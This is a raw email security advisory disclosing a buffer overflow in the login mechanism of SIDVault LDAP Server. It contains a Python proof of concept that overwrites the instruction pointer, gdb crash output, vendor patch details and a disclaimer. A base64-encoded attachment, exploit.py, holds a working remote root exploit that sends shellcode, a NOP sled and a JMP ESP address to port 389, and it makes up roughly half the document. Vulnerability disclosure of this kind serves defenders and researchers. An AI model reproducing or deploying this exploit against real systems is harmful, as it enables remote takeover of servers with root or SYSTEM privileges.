--=-fudtU7ez9UKBCv7MKoFd Content-Type: multipart/mixed; boundary="=-jXl88blkrAjQ/BczmKHP" --=-jXl88blkrAjQ/BczmKHP Content-Type: text/plain Content-Transfer-Encoding: quoted-printable SIDVault LDAP Server Remote Buffer Overflow =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D Product Description: SIDVault LDAP Server for Win32 and GNU/Linux SIDVault is a Simple Integration Database, allowing easy management and installations with high performance LDAP v3 server. It supports any number of schemas, easy to add/modify existing schemas, integrated web based user access, and fast browser based administration tools. Supports all relevant RFC protocols LDAP v2, LDAP v3, HTTP, ILS.=20 Vulnerable versions: Win32 2.0e Linux 2.0d Vulnerability Details: The login mechanism is prone to multiple buffer-overflow vulnerabilities because it fails to adequately bounds-check user-supplied input before copying it to an insufficiently sized buffer. Successfully exploiting the issue will allow an attacker to execute arbitrary code with root or SYSTEM-level privileges depending on the operative system target. Failed exploit attempts will result in a denial-of-service condition.=20 Proof of concept: # gdb /usr/local/sidvault/sidvault (...) (gdb) r -run In another terminal: $ cat poc.py import ldap l =3D ldap.open("localhost") l.simple_bind("dc=3D" + "A"*4099, "B"*256) $ ./poc.py In the first terminal: Program received signal SIGSEGV, Segmentation fault. [Switching to Thread -1226736720 (LWP 5942)] 0x41414141 in ?? () (gdb) where #0 0x41414141 in ?? () #1 0x41414141 in ?? () (...) Quit (gdb) i r eax 0x8202c48 136326216 ecx 0x0 0 edx 0xb6e164df -1226742561 ebx 0x41414141 1094795585 esp 0xb6e16500 0xb6e16500 ebp 0x41414141 0x41414141 esi 0x41414141 1094795585 edi 0x41414141 1094795585 eip 0x41414141 0x41414141 Exploit: An exploit for Debian based distributions which spawns a remote root terminal has been writen. See the attached exploit. Patch information: The problem is solved in the latest version (2.0f) which is available in the vendor's website at http://www.alphacentauri.co.nz/. Thanks: Thanks to Lynden Sherriff from Alphacentauri Ltd., he where very kind and professional. Disclaimer: The information in this advisory and any of its demonstrations is provided "as is" without any warranty of any kind.=20 I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory. Contact: Joxean Koret - joxeankoret[at]yahoo[dot]es --=-jXl88blkrAjQ/BczmKHP Content-Disposition: attachment; filename=exploit.py Content-Type: text/x-python; name=exploit.py; charset=UTF-8 Content-Transfer-Encoding: base64 IyEvdXNyL2Jpbi9weXRob24NCg0KIiIiDQpBbHBoYSBDZW50YXVyaSBTb2Z0d2FyZSBTSURWYXVs dCBMREFQIFNlcnZlciByZW1vdGUgcm9vdCBleHBsb2l0ICgwZGF5cykNCiIiIg0KDQppbXBvcnQg c3lzDQppbXBvcnQgc29ja2V0DQoNCnNjICA9ICJceGViXHgwM1x4NTlceGViXHgwNVx4ZThceGY4 XHhmZlx4ZmZceGZmXHg0Zlx4NDlceDQ5XHg0OVx4NDlceDQ5Ig0Kc2MgKz0gIlx4NDlceDUxXHg1 YVx4NTZceDU0XHg1OFx4MzZceDMzXHgzMFx4NTZceDU4XHgzNFx4NDFceDMwXHg0Mlx4MzYiDQpz YyArPSAiXHg0OFx4NDhceDMwXHg0Mlx4MzNceDMwXHg0Mlx4NDNceDU2XHg1OFx4MzJceDQyXHg0 NFx4NDJceDQ4XHgzNCINCnNjICs9ICJceDQxXHgzMlx4NDFceDQ0XHgzMFx4NDFceDQ0XHg1NFx4 NDJceDQ0XHg1MVx4NDJceDMwXHg0MVx4NDRceDQxIg0Kc2MgKz0gIlx4NTZceDU4XHgzNFx4NWFc eDM4XHg0Mlx4NDRceDRhXHg0Zlx4NGRceDQxXHgzM1x4NGJceDRkXHg0M1x4MzUiDQpzYyArPSAi XHg0M1x4NDRceDQzXHg0NVx4NGNceDU2XHg0NFx4MzBceDRjXHg0Nlx4NDhceDU2XHg0YVx4NDVc eDQ5XHg0OSINCnNjICs9ICJceDQ5XHgzOFx4NDFceDRlXHg0ZFx4NGNceDQyXHg1OFx4NDhceDU5 XHg0M1x4NDRceDQ0XHg1NVx4NDhceDM2Ig0Kc2MgKz0gIlx4NGFceDM2XHg0MVx4MzFceDRlXHgz NVx4NDhceDQ2XHg0M1x4MzVceDQ5XHg1OFx4NDFceDRlXHg0Y1x4NTYiDQpzYyArPSAiXHg0OFx4 NTZceDRhXHg1NVx4NDJceDQ1XHg0MVx4NTVceDQ4XHgzNVx4NDlceDQ4XHg0MVx4NGVceDRkXHg0 YyINCnNjICs9ICJceDQyXHg0OFx4NDJceDRiXHg0OFx4NDZceDQxXHg0ZFx4NDNceDRlXHg0ZFx4 NGNceDQyXHg0OFx4NDRceDM1Ig0Kc2MgKz0gIlx4NDRceDU1XHg0OFx4NDVceDQzXHg1NFx4NDlc eDM4XHg0MVx4NGVceDQyXHg0Ylx4NDhceDM2XHg0ZFx4NGMiDQpzYyArPSAiXHg0Mlx4MzhceDQz XHgzOVx4NGNceDQ2XHg0NFx4MzBceDQ5XHg1NVx4NDJceDRiXHg0Zlx4NDNceDRkXHg0YyINCnNj ICs9ICJceDQyXHgzOFx4NDlceDU0XHg0OVx4NDdceDQ5XHg0Zlx4NDJceDRiXHg0Ylx4NTBceDQ0 XHgzNVx4NGFceDQ2Ig0Kc2MgKz0gIlx4NGZceDMyXHg0Zlx4NDJceDQzXHg1N1x4NGFceDQ2XHg0 YVx4MzZceDRmXHgzMlx4NDRceDU2XHg0OVx4MzYiDQpzYyArPSAiXHg1MFx4NDZceDQ5XHgzOFx4 NDNceDRlXHg0NFx4NDVceDQzXHgzNVx4NDlceDU4XHg0MVx4NGVceDRkXHg0YyINCnNjICs9ICJc eDQyXHg0OFx4NWEiDQoNCiMNCiMgVGhlIGFkZHJlc3Mgd2Ugd2lsbCB1c2UgaXMgMHhmZmZmZTc3 NyAoSk1QIEVTUCBpbiBVYnVudHUncyBsaW51eC1nYXRlLnNvKQ0KIw0KYWRkciA9ICJceDc3XHhl N1x4ZmZceGZmIg0KDQp0aGVMaW5lID0gJ1x4OTAnKjIwNzYgKyBhZGRyKyAnXHg5MCcqKDIwMTkt bGVuKHNjKSkgKyBzYw0KDQpwa3QgID0gJzBceDgyXHgxMC9ceDAyXHgwMVx4MDFjXHg4Mlx4MTAo XHgwNFx4ODJceDEwXHgwNmRjPScNCnBrdCArPSB0aGVMaW5lDQpwa3QgKz0gJ1xuXHgwMVx4MDJc blx4MDFceDAwXHgwMlx4MDFceDAwXHgwMlx4MDFceDAwXHgwMVx4MDFceDAwXHg4N1x4MGJvYmpl Y3RDbGFzczBceDAwJw0KDQpzID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCwgc29ja2V0 LlNPQ0tfU1RSRUFNKQ0Kcy5jb25uZWN0KChzeXMuYXJndlsxXSwgMzg5KSkNCnMuc2VuZChwa3Qp DQpzLmNsb3NlKCkNCg== --=-jXl88blkrAjQ/BczmKHP-- --=-fudtU7ez9UKBCv7MKoFd Content-Type: application/pgp-signature; name=signature.asc Content-Description: This is a digitally signed message part -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2.2 (GNU/Linux) iD8DBQBG0M5CU6rFMEYDrlERAhaRAJwPyQkYFyNn3YuAmOH8QgScc1NZOwCgj0// 0Rs5w4FXjqcSB4tS0wKjofI= =6Wck -----END PGP SIGNATURE----- --=-fudtU7ez9UKBCv7MKoFd-- ______________________________________________ LLama Gratis a cualquier PC del Mundo. Llamadas a fijos y m镽iles desde 1 c幯timo por minuto. http://es.voice.yahoo.com